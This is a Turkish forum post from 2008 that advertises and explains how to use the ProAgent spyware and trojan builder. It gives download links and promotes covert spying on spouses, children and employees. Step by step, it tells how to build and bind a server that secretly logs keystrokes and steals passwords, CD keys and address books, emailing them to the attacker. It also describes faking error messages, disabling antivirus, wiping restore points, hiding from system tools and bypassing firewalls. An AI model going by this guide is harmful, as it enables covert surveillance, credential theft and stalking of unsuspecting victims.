AnasayfaAnasayfa  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

Paylaş | 
 

 proagent nedir?ve dowlantı..

Aşağa gitmek 
YazarMesaj
gundi002
OPERATÖR
OPERATÖR
avatar

Mesaj Sayısı : 19
Kayıt tarihi : 11/03/08

MesajKonu: proagent nedir?ve dowlantı..   Salı Mart 11, 2008 12:38 am

http://www.tamindir.com/program/6658/Pr ... _Fix_2.htm
veya
http://www.trojan-tr.org/pro.rar

indirebilirsiniz..
ProAgent casus yazilimi günümüzün en güçlü ve yetenekli izleme / takip etme yazilimlarindan birisidir.


PROAGENT NEDIR ?:
ProAgent casus yazilimi günümüzün en güçlü ve yetenekli izleme / takip etme yazilimlarindan birisidir.

ProAgent esinizin, çocuklarinizin, çalisanlarinizin ya da istediginiz herhangi bir kimsenin bilgisayar basinda yaptiklarini takip etmek için mükemmel bir çözümdür!

ProAgent klavyede basilan tüm tuslari, tüm aktif pencere yazilarini, ziyareet edilen tüm web sitelerini, bilgisayarda kullanilan yazilimlarin kullanici adi ve sifreleri ile çok daha fazlasini, server olustururken belirttiginiz e-mail adresinize rapor eder, hem de tamamen gizli olarak!

ProAgent her türlü sistemde sorunsuz çalisacak sekilde tasarlanmistir. PC'nin bir firewall arkasinda olmasi, router arkasinda ya da ag içinde olmasi ProAgent için hiç bir sorun teskil etmez. ProAgent tüm bu durumlarda sorunsuzca çalismasini sürdürür...

PROAGENT NE ISE YARAR ? :
ProAgent ile hedeflediginiz bilgisayardaki tüm sifreleri alabilir, o bilgisayarin klavyesi ile yazilan her yaziyi okuyabilir, hedef bilgisayarin ne zaman online ne zaman offline oldugunu yada hangi siteleri ziyaret edip hangi Chat programlarini kullandigini ögrenebilirsiniz

ANTIVIRÜS VE FIREWALL PROGRAMLARINCA TANINIR MI ? :
Ücretsiz ProAgent türü olan herkese açik sürüm tüm anti virüsler ve firewalllar tarafindan taninmaktadir. Anti virüslere yakalanmayan server sahibi olmak isteyenler ProAgent Special Edition satin almalidir.

PROAGENT SERVERIMI ÇALISTIRACAGIM BILGISAYARIN NE TÜR BAGLANTISI OLDUGUNUN BIR ÖNEMI VAR MI ? :
ProAgent serverini çalistiracaginiz bilgisayarin internete baglanmasi yeterlidir. Ag içinde olmasi yada modem veya router arkasinda olmasi hiçbir seyi degistirmez ProAgent her sart ve kosulda sorunsuz olarak çalismaktadir.

HANGI ISLETIM SISTEMLERINDE ÇALISIR ? :
ProAgent server'i ve client'i Windows 98 - 98SE - ME - 2000 - XP - 2003 ve Loghorn isletim sistemlerinde sorunsuz olarak çalisacak sekilde tasarlanmistir.

KULLANIM :

ÇALISMA MANTIGI NEDIR ?:
ProAgent iki parçadan olusur. Bu parçalardan birisi sitemizden indirdiginiz ProAgent paketinde "ProAgent.exe" olarak adlandirilan ProAgent Builder'idir. Bu Builder'i kullanarak kendinize bir Server olusturursunuz olusturmus oldugunuz bu Server dosyasi da bahsi geçen ikinci parçadir.

Size bilgilerinin gelmesini istediginiz bilgisayarda bu server dosyasini çalistirmali yada çalistirtmalisiniz. Server dosyasi çalistiktan sonra o bilgisayardan, serveri olustururken Builder'e yazmis oldugunuz mail adresine bilgi mailleriniz gelmeye baslayacaktir.

Kisacasi ProAgent builder'ini çalistirarak sisteminize ProAgent bulastirmis olmazsiniz. ProAgent'i bulastirmak için öncelikle Builder'i kullanarak bir server olusturmali ve sonra bu serveri çalistirmalisiniz

SERVER OLUSTURMA :
Öncelikle ProAgent'i çalistirin ve "Send Menu" bölümünden size gönderilecek olan mailde yer almasini istediginiz bilgilerin kutularini isaretleyin. Daha sonra "Options" bölümünden serverinizin hedef bilgisayarda çalistirildiginda yapmasini istediginiz islemleri belirleyin. Ve "Server Icon" kisminda serveriniza uygun bir simge belirleyin. Vede serverinizi bir dosya ile birlestirmek istiyorsaniz "Bind with File" bölümünü kullanarak birlestirme islemini gerçeklestirin. Son olarak "Notification" kismina mail adresinizi yazip sag alttaki "Create Server" butonuna tiklayin. Serveriniz ProAgent builderi ile ayni klasörde olusturulacaktir. Bu serveri sadece hedeflediginiz bilgisayarda yada bilgisayarlarda çalistirmaya dikkat edin. Server çalistirildiginda belirlediginiz ayarlar dogrultusunda size mailler göndermeye baslayacaktir. Gelen maillerdeki kriptolu bölümü farenizle kopyalayin ve Builder üzerindeki "Decryptor" butonuna tikla***** açilan yeni pencereye yapistirin. Islem sonucunda açilan yeni pencerede farede ki kriptolu veriyi kriptosuz olarak göreceksiniz.

SERVER TEMIZLEME iyelim ki olmasini istemediginiz birsey oldu ve olusturdugunuz serveri kaza ile kendi sisteminizde çalistirdiniz. ProAgent serverini temizlemek için yapmaniz gereken tek sey ProAgent Builder'inin üzerindeki "Remove Server" butonuna tiklamaktir. Islem sonucunda sisteminizde ProAgent serveri var ise ve bu server Lokal Server Korumasina sahip degilse sisteminizden temizlenir ve açilan bir bilgi penceresinde sonuç size bildirilir. Ancak silmeye çalistiginiz server Lokal Server Korumasina sahipse Builder bu serveri kaldiramaz.

BÖLÜM AÇIKLAMALARI :
Select Language :
Bu menüden geçerli bir lisan seçebilirsiniz. Ek olarak, eger bir lisan dosyasini herhangi bir dile tercüme eder ve onu "language" klasörünün içine kaydederseniz, çevirisini yapmis oldugunuz dil de bu menüde listelenecek ve kullanilabilir hale gelecektir.

Send Menü :
Send Passwords :
ProAgent Serverinin çalistirildigi sistemdeki sifreleri mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send CD-Keys :
ProAgent Serverinin çalistirildigi sistemdeki oyun ve programlarin CD Key'lerinin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send KeyLog roAgent Serverinin çalistirildigi sistemdeki klavye ile yazilan her yazinin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send Virtual Keyboard Logs :
ProAgent Serverinin çalistirildigi sistemdeki Virtual Keyboard (Sanal Klavye) Loglarinin size gönderilmesini istiyorsaniz bu özelligi isaretleyin. (Virtual Keyboard Loglari size bir ZIP dosyasi içinde maila ataçlanmis halde gönderilecektir.)

Send System Information :
ProAgent Serverinin çalistirildigi bilgisayarin sistem bilgilerinin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send Address Book :
ProAgent Serverinin çalistirildigi sistemdeki adres defterinde yer alan kayitlarin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send URL History roAgent Serverinin çalistirildigi sistemdeki browser ile ziyaret edilen sitelerin kayitlarinin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Send Processes Log :
ProAgent Serverinin çalistirildigi sistemdeki çalisan uygulama kayitlarinin mailinize göndermesini istiyorsaniz bu kutuyu isaretleyin.

Options :
Give a fake error message :
Serveriniz hedef bilgisayarda çalistirildiginda sahte bir hata mesaji versin ve çalismamis gibi görünsün istiyorsaniz bu kutuyu isaretleyin ve açilan "fake message" penceresindeki "Enter Error Message: " kutusuna serveriniz çalistirildiginda görünmesini istediginiz hata mesajini yazin. Ve "OK" butonuna tiklayin.

Melt server on install :Bu kutuyu seçili hale getirirseniz serveriniz hedef bilgisayarda çalistirildiginda bulasma islemi gerçeklestikten sonra görünen kismi otomatik olarak silinir. Ve serveriniz bir dosya ile birlestirilmisse geriye sadece birlestirildigi dosya kalir.

Disable AntiVirus Programs :
Bu kutuyu seçili hale getirirseniz serveriniz hedef bilgisayarda çalistirildiginda birçok anti virüs yazilimi otomatik olarak kapatilir.

Clear Windows XP Restore Points :
Bu kutu seçiliyken serverinizi olusturdugunuzda, serverinizin çalistirildigi sistem Windows XP ise Sistem Geri Yükleme özelligi kapatilir ve o ana kadar olusturulmus tüm sistem yedekleri silinir. Böylece hedef sistemde sistem geri yükleme özelligi kullanarak ProAgent serverinin çalistirildigi tarihten önceki bir tarihe geri yükleme yapilarak serverdan kurtulma olanagini engellemis olursunuz.

Protection for removing Local Server :
Bu kutu seçiliyken serverinizi olusturursaniz hedef bilgisayarda çalistirilan ProAgent serveri ProAgent Builder'i üzerindeki "Remove Server" butonuna tikla***** kaldirilamaz.

Server Extensions :
Bu menüden olusturulacak serverin uzantisini otomatik olarak belirleye bilirsiniz.

Uyar: ".cmd" uzantisi sadece Windows Nt tabanli sistemlerde çalisabilir! (NT, 2000, XP, 2003, vs...)

Advanced Settings Menu :

Invisibility Options :

Buradan server için pek çok gizlilik ayarini belirleyebilirsiniz.

Injection Options :

Buradan server kullanacagi enjeksiyon metodunu ayarlayabilirsiniz. (Varsayilan browsera enjekte, varsayilan e-mail progr***** enjekte ve ekjeksiyon kullanilmasin seçenekleri mevcuttur).

Sending Mail :

Bu bölümde serverin size mail gönderme periyodu ayarlarini düzenleyebilir ve farkli bir smtp server / port kullan özelliklerini aktif edebilirsiniz.

Delay Execution :

Buradan server için iki farkli gecikmeli çalisma metodundan birini seçebilirsiniz. (Server ilk restarttan sonra aktif edilsin veya belirlenen tarihten sonra aktif edilsin seçenekleri mevcuttur).

Automatic Uninstall :

Eger bu özelligi seçerseniz, server kendisni burada belirlenen tarihte otomatik olarak temizleyecektir.


KABILIYETLERI :
- Task manager,Process explorer(sysinternals) vs.. gibi tüm process viewerlarda process görünmez!
- Hiçbir explorer programinda sisteme çikardigi dosyalar görünmez!
- regedit.exe,msconfig,autorun.exe (sysinternals)vs.. gibi hiçbir registry programinda, registry anahtar ve degerleri görünmez!
- Varsayilan browsera dll inject ederek Firewall'lari bypass eder ve direkt mail gönderir!
- Zone-alarm'in son versiyonu vs.. gibi yeni jenerasyon firewall'lari bypass etmek için yeni injecting teknikleri kullanilmaktadir!
- Mail göndermek için asla sizin SMTP server'iniza gereksinim duymaz. Direkt MX servera gönderir.
- Otomatik olarak kaldirilabilme özelligi sunmaktadir.
- Gecikmeli çalisma özelligi.
- Bir kullanimlik server özelligi.
- Virtual Keyboard Logging Teknolojisi!


SIFRELER ve BILGILER :- Cute FTP
- Ipswitch WS_FTP
- FileZilla FTP
- FlashFXP FTP
- FAR FTP
- Peer FTP
- eXeem
- SendLink
- FtpNow
- DeluxeFtp
- DeluxeFtp Pro
- Morpheus
- BitComet
- FireFly

- MSN Messenger
- Windows Messenger
- Yahoo Messenger
- AOL Instant Messenger
- GAIM

- Microsoft Outlook
- Outlook Express
- Eudora Mail
- IncrediMail
- The Bat!
- Group Mail Free
- Netscape

- ICQ 99b
- ICQ 2000a
- ICQ 2000b
- ICQ 2002a
- ICQ 2002b
- ICQ 2003a
- ICQ 2003b
- ICQ Lite
- ICQ2GO
- ICQ 4.x
- ICQ 5.x
- Miranda
- Trillian
- &RQ (ICQ client)
- Chat Anywhere

- Internet Explorer üzerinde saklanan tüm sifreler
- Tüm Internet Explorer üzerinde saklanan sifre korumali sitelerin sifreleri
- MSN Explorer üzerinde saklanan tüm sifreler
- Win/Total Commander
- RAS
- Dial-Up (9x-me-2000-XP-2003)
- Bir çok oyuna ait seri numaralari

- Tüm keylog kayitlari ve kaydin tutuldugu pencerenin bilgileri (çoklu dil destegi!)
- Tüm Virtual Keyboard (Sanal Klavye) kayitlari
- Sisteme yüklenen tüm programlarin listesi
- Tüm adres defteri kayitlari
- Ses karti bilgisi
- Ekran karti bilgisi
- Islemci bilgisi
- Tüm özel sistem (shell) dizinlerinin listesi
- Windows sistemine ait tüm genel bilgiler
- Fiziksel bellek (RAM) durumu
- Pc açik kalma süresi ve çok daha fazlasi...
Sayfa başına dön Aşağa gitmek
 
proagent nedir?ve dowlantı..
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» TMT Nedir ?
» Sayma Düzeni Nedir?
» Scratch Nedir ?
» Yüz Felci Nedir ve Yüz Felci Tedavisi
» İCTİHAD NEDİR ?

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: Trojan ve Virüsler-
Buraya geçin: